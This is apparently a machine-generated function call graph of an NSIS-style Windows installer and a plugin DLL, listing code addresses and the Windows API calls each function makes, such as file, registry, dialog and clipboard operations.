4343 405d8c 4341->4343 4345 405ed1 4342->4345 4346 405dc7 4342->4346 4368 405c90 GetFileAttributesA CreateFileA 4343->4368 4345->4173 4346->4345 4348 405dcf wsprintfA 4346->4348 4347 405d96 CloseHandle GetShortPathNameA 4347->4345 4349 405daa 4347->4349 4350 40618a 17 API calls 4348->4350 4349->4342 4349->4345 4351 405df7 4350->4351 4369 405c90 GetFileAttributesA CreateFileA 4351->4369 4353 405e04 4353->4345 4354 405e13 GetFileSize GlobalAlloc 4353->4354 4355 405e35 4354->4355 4356 405eca CloseHandle 4354->4356 4357 405d08 ReadFile 4355->4357 4356->4345 4358 405e3d 4357->4358 4358->4356 4370 405bf5 lstrlenA 4358->4370 4361 405e54 lstrcpyA 4364 405e76 4361->4364 4362 405e68 4363 405bf5 4 API calls 4362->4363 4363->4364 4365 405ead SetFilePointer 4364->4365 4366 405d37 WriteFile 4365->4366 4367 405ec3 GlobalFree 4366->4367 4367->4356 4368->4347 4369->4353 4371 405c36 lstrlenA 4370->4371 4372 405c3e 4371->4372 4373 405c0f lstrcmpiA 4371->4373 4372->4361 4372->4362 4373->4372 4374 405c2d CharNextA 4373->4374 4374->4371 4896 4038c8 4897 4038d3 4896->4897 4898 4038d7 4897->4898 4899 4038da GlobalAlloc 4897->4899 4899->4898 4903 401fcb 4904 402bce 17 API calls 4903->4904 4905 401fd2 4904->4905 4906 40646b 2 API calls 4905->4906 4907 401fd8 4906->4907 4908 401fea 4907->4908 4910 406055 wsprintfA 4907->4910 4910->4908 4396 4014d6 4397 402bac 17 API calls 4396->4397 4398 4014dc Sleep 4397->4398 4400 402a5a 4398->4400 4911 6ff810e0 4920 6ff8110e 4911->4920 4912 6ff811c4 GlobalFree 4913 6ff812ad 2 API calls 4913->4920 4914 6ff811c3 4914->4912 4915 6ff811ea GlobalFree 4915->4920 4916 6ff81266 2 API calls 4919 6ff811b1 GlobalFree 4916->4919 4917 6ff81155 GlobalAlloc 4917->4920 4918 6ff812d1 lstrcpyA 4918->4920 4919->4920 4920->4912 4920->4913 4920->4914 4920->4915 4920->4916 4920->4917 4920->4918 4920->4919 4413 401759 4414 402bce 17 API calls 4413->4414 4415 401760 4414->4415 4416 401786 4415->4416 4417 40177e 4415->4417 4454 4060f7 lstrcpynA 4416->4454 4453 4060f7 lstrcpynA 4417->4453 4420 401791 4422 405a8f 3 API calls 4420->4422 4421 401784 4424 4063d2 5 API calls 4421->4424 4423 401797 lstrcatA 4422->4423 4423->4421 4446 4017a3 4424->4446 4425 40646b 2 API calls 4425->4446 4426 4017e4 4427 405c6b 2 API calls 4426->4427 4427->4446 4429 4017ba CompareFileTime 4429->4446 4430 40187e 4432 40521e 24 API calls 4430->4432 4431 401855 4433 40521e 24 API calls 4431->4433 4450 40186a 4431->4450 4435 401888 4432->4435 4433->4450 4434 4060f7 lstrcpynA 4434->4446 4436 4030d8 31 API calls 4435->4436 4437 40189b 4436->4437 4438 4018af SetFileTime 4437->4438 4440 4018c1 CloseHandle 4437->4440 4438->4440 4439 40618a 17 API calls 4439->4446 4441 4018d2 4440->4441 4440->4450 4442 4018d7 4441->4442 4443 4018ea 4441->4443 4444 40618a 17 API calls 4442->4444 4445 40618a 17 API calls 4443->4445 4447 4018df lstrcatA 4444->4447 4448 4018f2 4445->4448 4446->4425 4446->4426 4446->4429 4446->4430 4446->4431 4446->4434 4446->4439 4449 405813 MessageBoxIndirectA 4446->4449 4452 405c90 GetFileAttributesA CreateFileA 4446->4452 4447->4448 4448->4450 4451 405813 MessageBoxIndirectA 4448->4451 4449->4446 4451->4450 4452->4446 4453->4421 4454->4420 4921 401959 4922 402bac 17 API calls 4921->4922 4923 401960 4922->4923 4924 402bac 17 API calls 4923->4924 4925 40196d 4924->4925 4926 402bce 17 API calls 4925->4926 4927 401984 lstrlenA 4926->4927 4929 401994 4927->4929 4928 4019d4 4929->4928 4933 4060f7 lstrcpynA 4929->4933 4931 4019c4 4931->4928 4932 4019c9 lstrlenA 4931->4932 4932->4928 4933->4931 4934 6ff82be3 4935 6ff82bfb 4934->4935 4936 6ff81534 2 API calls 4935->4936 4937 6ff82c16 4936->4937 4938 40535c 4939 405507 4938->4939 4940 40537e GetDlgItem GetDlgItem GetDlgItem 4938->4940 4942 405537 4939->4942 4943 40550f GetDlgItem CreateThread CloseHandle 4939->4943 4983 4041b0 SendMessageA 4940->4983 4945 405586 4942->4945 4946 40554d ShowWindow ShowWindow 4942->4946 4948 405565 4942->4948 4943->4942 4944 4053ee 4949 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4944->4949 4953 4041e2 8 API calls 4945->4953 4985 4041b0 SendMessageA 4946->4985 4947 4055c0 4947->4945 4958 4055cd SendMessageA 4947->4958 4948->4947 4951 405575 4948->4951 4952 405599 ShowWindow 4948->4952 4956 405463 4949->4956 4957 405447 SendMessageA SendMessageA 4949->4957 4986 404154 4951->4986 4954 4055b9 4952->4954 4955 4055ab 4952->4955 4960 405592 4953->4960 4962 404154 SendMessageA 4954->4962 4961 40521e 24 API calls 4955->4961 4963 405476 4956->4963 4964 405468 SendMessageA 4956->4964 4957->4956 4958->4960 4965 4055e6 CreatePopupMenu 4958->4965 4961->4954 4962->4947 4967 40417b 18 API calls 4963->4967 4964->4963 4966 40618a 17 API calls 4965->4966 4968 4055f6 AppendMenuA 4966->4968 4969 405486 4967->4969 4970 405614 GetWindowRect 4968->4970 4971 405627 TrackPopupMenu 4968->4971 4972 4054c3 GetDlgItem SendMessageA 4969->4972 4973 40548f ShowWindow 4969->4973 4970->4971 4971->4960 4975 405643 4971->4975 4972->4960 4974 4054ea SendMessageA SendMessageA 4972->4974 4976 4054a5 ShowWindow 4973->4976 4978 4054b2 4973->4978 4974->4960 4977 405662 SendMessageA 4975->4977 4976->4978 4977->4977 4980 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4977->4980 4984 4041b0 SendMessageA 4978->4984 4981 4056a1 SendMessageA 4980->4981 4981->4981 4982 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4981->4982 4982->4960 4983->4944 4984->4972 4985->4948 4987 404161 SendMessageA 4986->4987 4988 40415b 4986->4988 4987->4945 4988->4987 4989 40275d 4990 402763 4989->4990 4991 402a5a 4990->4991 4992 40276b FindClose 4990->4992 4992->4991 4993 401a5e 4994 402bac 17 API calls 4993->4994 4995 401a67 4994->4995 4996 402bac 17 API calls 4995->4996 4997 401a0e 4996->4997 4998 40495e 4999 40498a 4998->4999 5000 40496e 4998->5000 5002 404990 SHGetPathFromIDListA 4999->5002 5003 4049bd 4999->5003 5009 4057f7 GetDlgItemTextA 5000->5009 5005 4049a0 5002->5005 5006 4049a7 SendMessageA 5002->5006 5004 40497b SendMessageA 5004->4999 5008 40140b 2 API calls 5005->5008 5006->5003 5008->5006 5009->5004 5010 4029de 5011 406500 5 API calls 5010->5011 5012 4029e5 5011->5012 5013 402bce 17 API calls 5012->5013 5014 4029ee 5013->5014 5017 402a2a 5014->5017 5020 40614a 5014->5020 5016 4029fc 5016->5017 5024 406134 5016->5024 5021 406155 5020->5021 5022 406178 IIDFromString 5021->5022 5023 406171 5021->5023 5022->5016 5023->5016 5027 406119 WideCharToMultiByte 5024->5027 5026 402a1d CoTaskMemFree 5026->5017 5027->5026 5028 4027df 5029 402bce 17 API calls 5028->5029 5031 4027ed 5029->5031 5030 402803 5032 405c6b 2 API calls 5030->5032 5031->5030 5033 402bce 17 API calls 5031->5033 5034 402809 5032->5034 5033->5030 5056 405c90 GetFileAttributesA CreateFileA 5034->5056 5036 402816 5037 402822 GlobalAlloc 5036->5037 5038 4028bf 5036->5038 5039 4028b6 CloseHandle 5037->5039 5040 40283b 5037->5040 5041 4028c7 DeleteFileA 5038->5041 5042 4028da 5038->5042 5039->5038 5057 403300 SetFilePointer 5040->5057 5041->5042 5044 402841 5045 4032ea ReadFile 5044->5045 5046 40284a GlobalAlloc 5045->5046 5047 402894 5046->5047 5048 40285a 5046->5048 5049 405d37 WriteFile 5047->5049 5050 4030d8 31 API calls 5048->5050 5051 4028a0 GlobalFree 5049->5051 5055 402867 5050->5055 5052 4030d8 31 API calls 5051->5052 5054 4028b3 5052->5054 5053 40288b GlobalFree 5053->5047 5054->5039 5055->5053 5056->5036 5057->5044 4663 4023e0 4664 402bce 17 API calls 4663->4664 4665 4023f1 4664->4665 4666 402bce 17 API calls 4665->4666 4667 4023fa 4666->4667 4668 402bce 17 API calls 4667->4668 4669 402404 GetPrivateProfileStringA 4668->4669 5058 4028e0 5059 402bac 17 API calls 5058->5059 5060 4028e6 5059->5060 5061 402925 5060->5061 5062 40290e 5060->5062 5071 4027bf 5060->5071 5063 40293f 5061->5063 5064 40292f 5061->5064 5065 402913 5062->5065 5066 402922 5062->5066 5068 40618a 17 API calls 5063->5068 5067 402bac 17 API calls 5064->5067 5072 4060f7 lstrcpynA 5065->5072 5073 406055 wsprintfA 5066->5073 5067->5071 5068->5071 5072->5071 5073->5071 5074 6ff81058 5076 6ff81074 5074->5076 5075 6ff810dc 5076->5075 5077 6ff81091 5076->5077 5087 6ff814bb 5076->5087 5079 6ff814bb GlobalFree 5077->5079 5080 6ff810a1 5079->5080 5081 6ff810a8 GlobalSize 5080->5081 5082 6ff810b1 5080->5082 5081->5082 5083 6ff810b5 GlobalAlloc 5082->5083 5084 6ff810c6 5082->5084 5085 6ff814e2 3 API calls 5083->5085 5086 6ff810d1 GlobalFree 5084->5086 5085->5084 5086->5075 5089 6ff814c1 5087->5089 5088 6ff814c7 5088->5077 5089->5088 5090 6ff814d3 GlobalFree 5089->5090 5090->5077 5091 6ff8225a 5092 6ff822c4 5091->5092 5093 6ff822ee 5092->5093 5094 6ff822cf GlobalAlloc 5092->5094 5094->5092 5095 401b63 5096 402bce 17 API calls 5095->5096 5097 401b6a 5096->5097 5098 402bac 17 API calls 5097->5098 5099 401b73 wsprintfA 5098->5099 5100 402a5a 5099->5100 5101 401d65 5102 401d78 GetDlgItem 5101->5102 5103 401d6b 5101->5103 5104 401d72 5102->5104 5105 402bac 17 API calls 5103->5105 5106 401db9 GetClientRect LoadImageA SendMessageA 5104->5106 5107 402bce 17 API calls 5104->5107 5105->5104 5109 401e1a 5106->5109 5111 401e26 5106->5111 5107->5106 5110 401e1f DeleteObject 5109->5110 5109->5111 5110->5111 5112 4042e6 5113 4042fc 5112->5113 5118 404408 5112->5118 5115 40417b 18 API calls 5113->5115 5114 404477 5116 404541 5114->5116 5117 404481 GetDlgItem 5114->5117 5119 404352 5115->5119 5124 4041e2 8 API calls 5116->5124 5120 404497 5117->5120 5121 4044ff 5117->5121 5118->5114 5118->5116 5122 40444c GetDlgItem SendMessageA 5118->5122 5123 40417b 18 API calls 5119->5123 5120->5121 5128 4044bd SendMessageA LoadCursorA SetCursor 5120->5128 5121->5116 5129 404511 5121->5129 5145 40419d EnableWindow 5122->5145 5126 40435f CheckDlgButton 5123->5126 5127 40453c 5124->5127 5143 40419d EnableWindow 5126->5143 5149 40458a 5128->5149 5133 404517 SendMessageA 5129->5133 5134 404528 5129->5134 5130 404472 5146 404566 5130->5146 5133->5134 5134->5127 5135 40452e SendMessageA 5134->5135 5135->5127 5137 40437d GetDlgItem 5144 4041b0 SendMessageA 5137->5144 5140 404393 SendMessageA 5141 4043b1 GetSysColor 5140->5141 5142 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5140->5142 5141->5142 5142->5127 5143->5137 5144->5140 5145->5130 5147 404574 5146->5147 5148 404579 SendMessageA 5146->5148 5147->5148 5148->5114 5152 4057d9 ShellExecuteExA 5149->5152 5151 4044f0 LoadCursorA SetCursor 5151->5121 5152->5151 5153 6ff815d1 5154 6ff814bb GlobalFree 5153->5154 5155 6ff815e9 5154->5155 5156 6ff8162f GlobalFree 5155->5156 5157 6ff81604 5155->5157 5158 6ff8161b VirtualFree 5155->5158 5157->5156 5158->5156 4711 40166a 4712 402bce 17 API calls 4711->4712 4713 401671 4712->4713 4714 402bce 17 API calls 4713->4714 4715 40167a 4714->4715 4716 402bce 17 API calls 4715->4716 4717 401683 MoveFileA 4716->4717 4718 401696 4717->4718 4724 40168f 4717->4724 4720 4022e2 4718->4720 4721 40646b 2 API calls 4718->4721 4719 401423 24 API calls 4719->4720 4722 4016a5 4721->4722 4722->4720 4723 405ed6 36 API calls 4722->4723 4723->4724 4724->4719 4725 40216b 4726 402bce 17 API calls 4725->4726 4727 402172 4726->4727 4728 402bce 17 API calls 4727->4728 4729 40217c 4728->4729 4730 402bce 17 API calls 4729->4730 4731 402186 4730->4731 4732 402bce 17 API calls 4731->4732 4733 402193 4732->4733 4734 402bce 17 API calls 4733->4734 4735 40219d 4734->4735 4736 4021df CoCreateInstance 4735->4736 4737 402bce 17 API calls 4735->4737 4740 4021fe 4736->4740 4742 4022ac 4736->4742 4737->4736 4738 401423 24 API calls 4739 4022e2 4738->4739 4741 40228c MultiByteToWideChar 4740->4741 4740->4742 4741->4742 4742->4738 4742->4739 5159 4022eb 5160 402bce 17 API calls 5159->5160 5161 4022f1 5160->5161 5162 402bce 17 API calls 5161->5162 5163 4022fa 5162->5163 5164 402bce 17 API calls 5163->5164 5165 402303 5164->5165 5166 40646b 2 API calls 5165->5166 5167 40230c 5166->5167 5168 40231d lstrlenA lstrlenA 5167->5168 5172 402310 5167->5172 5170 40521e 24 API calls 5168->5170 5169 40521e 24 API calls 5173 402318 5169->5173 5171 402359 SHFileOperationA 5170->5171 5171->5172 5171->5173 5172->5169 5172->5173 4752 40266d 4753 402bac 17 API calls 4752->4753 4758 402677 4753->4758 4754 4026e5 4755 405d08 ReadFile 4755->4758 4756 4026e7 4761 406055 wsprintfA 4756->4761 4757 4026f7 4757->4754 4760 40270d SetFilePointer 4757->4760 4758->4754 4758->4755 4758->4756 4758->4757 4760->4754 4761->4754 5174 40236d 5175 402374 5174->5175 5178 402387 5174->5178 5176 40618a 17 API calls 5175->5176 5177 402381 5176->5177 5177->5178 5179 405813 MessageBoxIndirectA 5177->5179 5179->5178 5180 4019ed 5181 402bce 17 API calls 5180->5181 5182 4019f4 5181->5182 5183 402bce 17 API calls 5182->5183 5184 4019fd 5183->5184 5185 401a04 lstrcmpiA 5184->5185 5186 401a16 lstrcmpA 5184->5186 5187 401a0a 5185->5187 5186->5187 5188 40296e 5189 402bac 17 API calls 5188->5189 5190 402974 5189->5190 5191 4029af 5190->5191 5192 4027bf 5190->5192 5194 402986 5190->5194 5191->5192 5193 40618a 17 API calls 5191->5193 5193->5192 5194->5192 5196 406055 wsprintfA 5194->5196 5196->5192 5197 4014f4 SetForegroundWindow 5198 402a5a 5197->5198 4798 402476 4799 402bce 17 API calls 4798->4799 4800 402488 4799->4800 4801 402bce 17 API calls 4800->4801 4802 402492 4801->4802 4815 402c5e 4802->4815 4805 402a5a 4806 4024c7 4809 402bac 17 API calls 4806->4809 4811 4024d3 4806->4811 4807 402bce 17 API calls 4808 4024c0 lstrlenA 4807->4808 4808->4806 4809->4811 4810 4024f5 RegSetValueExA 4813 40250b RegCloseKey 4810->4813 4811->4810 4812 4030d8 31 API calls 4811->4812 4812->4810 4813->4805 4816 402c79 4815->4816 4819 405fab 4816->4819 4820 405fba 4819->4820 4821 4024a2 4820->4821 4822 405fc5 RegCreateKeyExA 4820->4822 4821->4805 4821->4806 4821->4807 4822->4821 5199 402777 5200 40277d 5199->5200 5201 402781 FindNextFileA 5200->5201 5204 402793 5200->5204 5202 4027d2 5201->5202 5201->5204 5205 4060f7 lstrcpynA 5202->5205 5205->5204 5206 401ef9 5207 402bce 17 API calls 5206->5207 5208 401eff 5207->5208 5209 402bce 17 API calls 5208->5209 5210 401f08 5209->5210 5211 402bce 17 API calls 5210->5211 5212 401f11 5211->5212 5213 402bce 17 API calls 5212->5213 5214 401f1a 5213->5214 5215 401423 24 API calls 5214->5215 5216 401f21 5215->5216 5223 4057d9 ShellExecuteExA 5216->5223 5218 401f5c 5219 406575 5 API calls 5218->5219 5221 4027bf 5218->5221 5220 401f76 CloseHandle 5219->5220 5220->5221 5223->5218 4823 401f7b 4824 402bce 17 API calls 4823->4824 4825 401f81 4824->4825 4826 40521e 24 API calls 4825->4826 4827 401f8b 4826->4827 4828 405796 2 API calls 4827->4828 4829 401f91 4828->4829 4830 4027bf 4829->4830 4837 401fb2 CloseHandle 4829->4837 4838 406575 WaitForSingleObject 4829->4838 4833 401fa6 4834 401fb4 4833->4834 4835 401fab 4833->4835 4834->4837 4843 406055 wsprintfA 4835->4843 4837->4830 4839 40658f 4838->4839 4840 4065a1 GetExitCodeProcess 4839->4840 4841 40653c 2 API calls 4839->4841 4840->4833 4842 406596 WaitForSingleObject 4841->4842 4842->4839 4843->4837 5224 401ffb 5225 402bce 17 API calls 5224->5225 5226 402002 5225->5226 5227 406500 5 API calls 5226->5227 5228 402011 5227->5228 5229 402029 GlobalAlloc 5228->5229 5230 402091 5228->5230 5229->5230 5231 40203d 5229->5231 5232 406500 5 API calls 5231->5232 5233 402044 5232->5233 5234 406500 5 API calls 5233->5234 5235 40204e 5234->5235 5235->5230 5239 406055 wsprintfA 5235->5239 5237 402085 5240 406055 wsprintfA 5237->5240 5239->5237 5240->5230 5241 4018fd 5242 401934 5241->5242 5243 402bce 17 API calls 5242->5243 5244 401939 5243->5244 5245 4058bf 67 API calls 5244->5245 5246 401942 5245->5246 5247 401000 5248 401037 BeginPaint GetClientRect 5247->5248 5249 40100c DefWindowProcA 5247->5249 5250 4010f3 5248->5250 5254 401179 5249->5254 5252 401073 CreateBrushIndirect FillRect DeleteObject 5250->5252 5253 4010fc 5250->5253 5252->5250 5255 401102 CreateFontIndirectA 5253->5255 5256 401167 EndPaint 5253->5256 5255->5256 5257 401112 6 API calls 5255->5257 5256->5254 5257->5256 5258 401900 5259 402bce 17 API calls 5258->5259 5260 401907 5259->5260 5261 405813 MessageBoxIndirectA 5260->5261 5262 401910 5261->5262 5263 404b80 GetDlgItem GetDlgItem 5264 404bd6 7 API calls 5263->5264 5270 404dfd 5263->5270 5265 404c72 SendMessageA 5264->5265 5266 404c7e DeleteObject 5264->5266 5265->5266 5267 404c89 5266->5267 5268 404cc0 5267->5268 5271 40618a 17 API calls 5267->5271 5272 40417b 18 API calls 5268->5272 5269 404edf 5273 404f8b 5269->5273 5278 404df0 5269->5278 5283 404f38 SendMessageA 5269->5283 5270->5269 5293 404e6c 5270->5293 5317 404ace SendMessageA 5270->5317 5276 404ca2 SendMessageA SendMessageA 5271->5276 5277 404cd4 5272->5277 5274 404f95 SendMessageA 5273->5274 5275 404f9d 5273->5275 5274->5275 5285 404fb6 5275->5285 5286 404faf ImageList_Destroy 5275->5286 5294 404fc6 5275->5294 5276->5267 5282 40417b 18 API calls 5277->5282 5280 4041e2 8 API calls 5278->5280 5279 404ed1 SendMessageA 5279->5269 5284 40518b 5280->5284 5298 404ce5 5282->5298 5283->5278 5288 404f4d SendMessageA 5283->5288 5289 404fbf GlobalFree 5285->5289 5285->5294 5286->5285 5287 40513f 5287->5278 5295 405151 ShowWindow GetDlgItem ShowWindow 5287->5295 5291 404f60 5288->5291 5289->5294 5290 404dbf GetWindowLongA SetWindowLongA 5292 404dd8 5290->5292 5303 404f71 SendMessageA 5291->5303 5296 404df5 5292->5296 5297 404ddd ShowWindow 5292->5297 5293->5269 5293->5279 5294->5287 5309 405001 5294->5309 5322 404b4e 5294->5322 5295->5278 5316 4041b0 SendMessageA 5296->5316 5315 4041b0 SendMessageA 5297->5315 5298->5290 5299 404dba 5298->5299 5302 404d37 SendMessageA 5298->5302 5304 404d75 SendMessageA 5298->5304 5305 404d89 SendMessageA 5298->5305 5299->5290 5299->5292 5302->5298 5303->5273 5304->5298 5305->5298 5307 40510b 5308 405115 InvalidateRect 5307->5308 5311 405121 5307->5311 5308->5311 5310 40502f SendMessageA 5309->5310 5313 405045 5309->5313 5310->5313 5311->5287 5331 404a89 5311->5331 5312 4050b9 SendMessageA SendMessageA 5312->5313 5313->5307 5313->5312 5315->5278 5316->5270 5318 404af1 GetMessagePos ScreenToClient SendMessageA 5317->5318 5319 404b2d SendMessageA 5317->5319 5320 404b25 5318->5320 5321 404b2a 5318->5321 5319->5320 5320->5293 5321->5319 5334 4060f7 lstrcpynA 5322->5334 5324 404b61 5335 406055 wsprintfA 5324->5335 5326 404b6b 5327 40140b 2 API calls 5326->5327 5328 404b74 5327->5328 5336 4060f7 lstrcpynA 5328->5336 5330 404b7b 5330->5309 5337 4049c4 5331->5337 5333 404a9e 5333->5287 5334->5324 5335->5326 5336->5330 5338 4049da 5337->5338 5339 40618a 17 API calls 5338->5339 5340 404a3e 5339->5340 5341 40618a 17 API calls 5340->5341 5342 404a49 5341->5342 5343 40618a 17 API calls 5342->5343 5344 404a5f lstrlenA wsprintfA SetDlgItemTextA 5343->5344 5344->5333 5345 6ff81638 5346 6ff81667 5345->5346 5347 6ff81a98 18 API calls 5346->5347 5348 6ff8166e 5347->5348 5349 6ff81681 5348->5349 5350 6ff81675 5348->5350 5352 6ff816a8 5349->5352 5353 6ff8168b 5349->5353 5351 6ff81266 2 API calls 5350->5351 5356 6ff8167f 5351->5356 5354 6ff816ae 5352->5354 5355 6ff816d2 5352->5355 5357 6ff814e2 3 API calls 5353->5357 5358 6ff81559 3 API calls 5354->5358 5359 6ff814e2 3 API calls 5355->5359 5360 6ff81690 5357->5360 5362 6ff816b3 5358->5362 5359->5356 5361 6ff81559 3 API calls 5360->5361 5363 6ff81696 5361->5363 5364 6ff81266 2 API calls 5362->5364 5365 6ff81266 2 API calls 5363->5365 5366 6ff816b9 GlobalFree 5364->5366 5367 6ff8169c GlobalFree 5365->5367 5366->5356 5368 6ff816cd GlobalFree 5366->5368 5367->5356 5368->5356 5369 401502 5370 40150a 5369->5370 5372 40151d 5369->5372 5371 402bac 17 API calls 5370->5371 5371->5372 5373 402604 5374 402bce 17 API calls 5373->5374 5375 40260b 5374->5375 5378 405c90 GetFileAttributesA CreateFileA 5375->5378 5377 402617 5378->5377 5379 6ff8103d 5382 6ff8101b 5379->5382 5383 6ff814bb GlobalFree 5382->5383 5384 6ff81020 5383->5384 5385 6ff81027 GlobalAlloc 5384->5385 5386 6ff81024 5384->5386 5385->5386 5387 6ff814e2 3 API calls 5386->5387 5388 6ff8103b 5387->5388 5389 401b87 5390 401b94 5389->5390 5391 401bd8 5389->5391 5394 401c1c 5390->5394 5398 401bab 5390->5398 5392 401c01 GlobalAlloc 5391->5392 5393 401bdc 5391->5393 5395 40618a 17 API calls 5392->5395 5402 402387 5393->5402 5410 4060f7 lstrcpynA 5393->5410 5396 40618a 17 API calls 5394->5396 5394->5402 5395->5394 5399 402381 5396->5399 5408 4060f7 lstrcpynA 5398->5408 5399->5402 5403 405813 MessageBoxIndirectA 5399->5403 5400 401bee GlobalFree 5400->5402 5403->5402 5404 401bba 5409 4060f7 lstrcpynA 5404->5409 5406 401bc9 5411 4060f7 lstrcpynA 5406->5411 5408->5404 5409->5406 5410->5400 5411->5402 4375 402588 4387 402c0e 4375->4387 4378 402bac 17 API calls 4379 40259b 4378->4379 4380 4025a9 4379->4380 4385 4027bf 4379->4385 4381 4025c2 RegEnumValueA 4380->4381 4382 4025b6 RegEnumKeyA 4380->4382 4383 4025de RegCloseKey 4381->4383 4384 4025d7 4381->4384 4382->4383 4383->4385 4384->4383 4388 402bce 17 API calls 4387->4388 4389 402c25 4388->4389 4390 405f7d RegOpenKeyExA 4389->4390 4391 402592 4390->4391 4391->4378 4392 401389 4394 401390 4392->4394 4393 4013fe 4394->4393 4395 4013cb MulDiv SendMessageA 4394->4395 4395->4394 5412 40460d 5413 404639 5412->5413 5414 40464a 5412->5414 5473 4057f7 GetDlgItemTextA 5413->5473 5416 404656 GetDlgItem 5414->5416 5421 4046b5 5414->5421 5418 40466a 5416->5418 5417 404644 5420 4063d2 5 API calls 5417->5420 5423 40467e SetWindowTextA 5418->5423 5428 405b28 4 API calls 5418->5428 5419 404799 5471 404943 5419->5471 5475 4057f7 GetDlgItemTextA 5419->5475 5420->5414 5421->5419 5425 40618a 17 API calls 5421->5425 5421->5471 5426 40417b 18 API calls 5423->5426 5424 4047c9 5429 405b7d 18 API calls 5424->5429 5430 404729 SHBrowseForFolderA 5425->5430 5431 40469a 5426->5431 5427 4041e2 8 API calls 5432 404957 5427->5432 5433 404674 5428->5433 5434 4047cf 5429->5434 5430->5419 5435 404741 CoTaskMemFree 5430->5435 5436 40417b 18 API calls 5431->5436 5433->5423 5437 405a8f 3 API calls 5433->5437 5476 4060f7 lstrcpynA 5434->5476 5438 405a8f 3 API calls 5435->5438 5439 4046a8 5436->5439 5437->5423 5440 40474e 5438->5440 5474 4041b0 SendMessageA 5439->5474 5443 404785 SetDlgItemTextA 5440->5443 5448 40618a 17 API calls 5440->5448 5443->5419 5444 4046ae 5446 406500 5 API calls 5444->5446 5445 4047e6 5447 406500 5 API calls 5445->5447 5446->5421 5455 4047ed 5447->5455 5449 40476d lstrcmpiA 5448->5449 5449->5443 5452 40477e lstrcatA 5449->5452 5450 404829 5477 4060f7 lstrcpynA 5450->5477 5452->5443 5453 404830 5454 405b28 4 API calls 5453->5454 5456 404836 GetDiskFreeSpaceA 5454->5456 5455->5450 5458 405ad6 2 API calls 5455->5458 5460 404881 5455->5460 5459 40485a MulDiv 5456->5459 5456->5460 5458->5455 5459->5460 5461 404a89 20 API calls 5460->5461 5463 4048f2 5460->5463 5465 4048df 5461->5465 5462 404915 5478 40419d EnableWindow 5462->5478 5463->5462 5464 40140b 2 API calls 5463->5464 5464->5462 5467 4048f4 SetDlgItemTextA 5465->5467 5468 4048e4 5465->5468 5467->5463 5470 4049c4 20 API calls 5468->5470 5469 404931 5469->5471 5472 404566 SendMessageA 5469->5472 5470->5463 5471->5427 5472->5471 5473->5417 5474->5444 5475->5424 5476->5445 5477->5453 5478->5469 5479 6ff81837 5480 6ff8185a 5479->5480 5481 6ff8188a GlobalFree 5480->5481 5482 6ff8189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5480->5482 5481->5482 5483 6ff81266 2 API calls 5482->5483 5484 6ff81a1e GlobalFree GlobalFree 5483->5484 5485 401490 5486 40521e 24 API calls 5485->5486 5487 401497 5486->5487 5488 405192 5489 4051a2 5488->5489 5490 4051b6 5488->5490 5491 4051ff 5489->5491 5492 4051a8 5489->5492 5493 4051be IsWindowVisible 5490->5493 5499 4051d5 5490->5499 5494 405204 CallWindowProcA 5491->5494 5495 4041c7 SendMessageA 5492->5495 5493->5491 5496 4051cb 5493->5496 5497 4051b2 5494->5497 5495->5497 5498 404ace 5 API calls 5496->5498 5498->5499 5499->5494 5500 404b4e 4 API calls 5499->5500 5500->5491 4401 402516 4402 402c0e 17 API calls 4401->4402 4403 402520 4402->4403 4404 402bce 17 API calls 4403->4404 4405 402529 4404->4405 4406 402533 RegQueryValueExA 4405->4406 4409 4027bf 4405->4409 4407 402553 4406->4407 4411 402559 RegCloseKey 4406->4411 4407->4411 4412 406055 wsprintfA 4407->4412 4411->4409 4412->4411 4455 6ff82921 4456 6ff82971 4455->4456 4457 6ff82931 VirtualProtect 4455->4457 4457->4456 4458 40239c 4459 4023a4 4458->4459 4460 4023aa 4458->4460 4461 402bce 17 API calls 4459->4461 4462 4023ba 4460->4462 4464 402bce 17 API calls 4460->4464 4461->4460 4463 4023c8 4462->4463 4465 402bce 17 API calls 4462->4465 4466 402bce 17 API calls 4463->4466 4464->4462 4465->4463 4467 4023d1 WritePrivateProfileStringA 4466->4467 4468 40209d 4469 40215d 4468->4469 4470 4020af 4468->4470 4472 401423 24 API calls 4469->4472 4471 402bce 17 API calls 4470->4471 4473 4020b6 4471->4473 4478 4022e2 4472->4478 4474 402bce 17 API calls 4473->4474 4475 4020bf 4474->4475 4476 4020d4 LoadLibraryExA 4475->4476 4477 4020c7 GetModuleHandleA 4475->4477 4476->4469 4479 4020e4 GetProcAddress 4476->4479 4477->4476 4477->4479 4480 402130 4479->4480 4481 4020f3 4479->4481 4484 40521e 24 API calls 4480->4484 4482 402112 4481->4482 4483 4020fb 4481->4483 4489 6ff816db 4482->4489 4531 401423 4483->4531 4486 402103 4484->4486 4486->4478 4487 402151 FreeLibrary 4486->4487 4487->4478 4490 6ff8170b 4489->4490 4534 6ff81a98 4490->4534 4492 6ff81712 4493 6ff81834 4492->4493 4494 6ff8172a 4492->4494 4495 6ff81723 4492->4495 4493->4486 4566 6ff822f1 4494->4566 4582 6ff822af 4495->4582 4500 6ff81759 4515 6ff8174f 4500->4515 4592 6ff82cc3 4500->4592 4501 6ff81740 4505 6ff81746 4501->4505 4509 6ff81751 4501->4509 4502 6ff8178e 4506 6ff817dc 4502->4506 4507 6ff81794 4502->4507 4503 6ff81770 4595 6ff824d8 4503->4595 4505->4515 4576 6ff82a38 4505->4576 4513 6ff824d8 11 API calls 4506->4513 4614 6ff8156b 4507->4614 4508 6ff81776 4606 6ff81559 4508->4606 4586 6ff826b2 4509->4586 4518 6ff817cd 4513->4518 4515->4502 4515->4503 4530 6ff81823 4518->4530 4620 6ff8249e 4518->4620 4520 6ff81757 4520->4515 4521 6ff824d8 11 API calls 4521->4518 4525 6ff8182d GlobalFree 4525->4493 4526 6ff8180f 4526->4530 4624 6ff814e2 wsprintfA 4526->4624 4528 6ff81808 FreeLibrary 4528->4526 4530->4493 4530->4525 4532 40521e 24 API calls 4531->4532 4533 401431 4532->4533 4533->4486 4627 6ff81215 GlobalAlloc 4534->4627 4536 6ff81abf 4628 6ff81215 GlobalAlloc 4536->4628 4538 6ff81d00 GlobalFree GlobalFree GlobalFree 4539 6ff81d1d 4538->4539 4550 6ff81d67 4538->4550 4540 6ff820f1 4539->4540 4548 6ff81d32 4539->4548 4539->4550 4542 6ff82113 